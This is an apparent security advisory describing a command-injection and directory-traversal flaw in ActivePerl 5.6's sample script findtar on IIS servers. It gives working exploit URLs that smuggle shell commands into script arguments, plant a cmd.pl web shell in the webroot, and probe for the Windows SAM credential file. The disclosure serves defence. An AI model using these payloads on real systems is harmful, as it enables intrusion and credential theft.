|
|
|
|
| |
| Based on Perl 5.6, ActivePerl 5.6 is a significantly enhanced distribution, encompassing the new features available in Perl 5.6. The Windows package provides additional features to take advantage of that platform. A security problem in the product allows remote attackers to execute arbitrary command on a remote server. |
| |
Credit:
The information has been provided by Billy Nothern.
|
| |
Vulnerable systems:
ActivePerl version 5.6
If the following requirements are true:
1) The server is running ActiveState's Perl.
2) The attacker knows where Perl is located.
It is possible for a remote attacker to cause a remote server to execute arbitrary commands.
Example:
http://host.example.com/."./."./Perl/eg/core/findtar+&+echo+hacked +>+c:\InetPub\wwwroot\hacked.html+&+.pl
The mentioned URL will execute C:\Perl\eg\core\findtar with arguments of:
& echo hacked > c:\InetPub\wwwroot\hacked.html & .pl
findtar is a sample that comes with ActiveState's Perl. It might also be present with other versions of Perl as well. There are several scripts that you can use to attack; findtar is just an example. When findtar is executed, it uses the command line arguments in an open() call. Here is the bad line of findtar:
open(find,"/usr/bin/find $args -ls |") || die "Can't run find for you.";
Just before this, $args is set by saying:
$args = join(' ',@ARGV);
As you can see, there isn't any sanity checks of the arguments before they are passed to the open() call, and so passing the arguments mentioned earlier results in the command line:
find & echo hacked > c:\InetPub\wwwroot\hacked.html & .pl -ls
Being executed on the system. Now going to http://host.example.com/hacked.html will result in "hacked" being displayed.
Here's an example attack:
Assuming that the wwwroot of HOST is C:\InetPub\wwwroot\
Assuming that Perl is located in C:\Perl\
http://host.example.com/."./."./Perl/eg/core/findtar+&+echo+system(@ARGV);+>+c:\InetPub\wwwroot\cmd.pl+&+.pl
We now have a file at http://host.example.com/cmd.pl that passes it's arguments to system(); Executing commands is even easier now, and we can see the command's output. To execute "net view" we would simply call:
http://host.example.com/cmd.pl?net%20view
And the output would be returned to us. It's worth mentioning that the various parts of this exploit can be used alone.
You can get Perl to read any file you want by simply traversing to C:\ and then walking back up to it's path. To see if C:\winnt\repair\sam._ exists, we would simply go to:
http://host.example.com/."./."./winnt/reapir/sam._%20.pl
Perl will respond with something other than "File Not Found" if the file exists.
You could use the bad example files from ActiveState's Perl if Perl was installed, anywhere on the wwwroot branch. Say we installed Perl to C:\InetPub\wwwroot\Perl\. It would be trivial to get C:\InetPub\wwwroot\Perl\eg\core\findtar to execute commands for us. This would also apply to a Unix installation.
|
|
|
|
|
|
|
|
|
|
